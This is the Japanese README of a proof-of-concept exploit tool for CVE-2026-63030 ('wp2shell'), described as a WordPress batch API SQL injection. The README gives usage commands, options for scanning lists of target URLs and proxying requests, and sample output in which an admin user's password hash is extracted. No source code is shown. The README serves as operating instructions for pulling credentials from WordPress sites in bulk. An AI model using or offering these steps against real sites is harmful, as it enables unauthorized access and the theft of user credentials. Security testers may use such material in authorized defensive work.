
CVE-2026-63030 (wp2shell) POC.
WordPress バッチAPI非同期化SQLインジェクションエクスプロイト
CVE-2026-63030(wp2shell)の脆弱性を利用して、ユーザーとパスワードハッシュを抽出するための概念実証(PoC)ツール。
python POC.py <target_url> [options]
python POC.py --rest-route http://target.com
| 引数 | 説明 | デフォルト |
|---|---|---|
target | 単一ターゲットURL | - |
-l, --list | ターゲットURLのリストを含むファイル(1行に1つ) | - |
--prefix | データベースのテーブルプレフィックス | wp_ |
--rest-route | ?rest_route= を使用 | 無効 |
--timeout | リクエストタイムアウト(秒) | 30 |
--proxy | HTTPプロキシ(Burp/ZAP互換) | なし |
--max-len | 最大抽出長 | 255 |
[*] Scanning: http://127.0.0.1/
[*] 1 users found
[+] ID:1 User:admin Hash:$wp$2y$10$Z6gwPduKb7wAbm0bHht1be7SxrgbyxgnbPmTVcVz9nP1KBX811xQy
[*] Requests: 553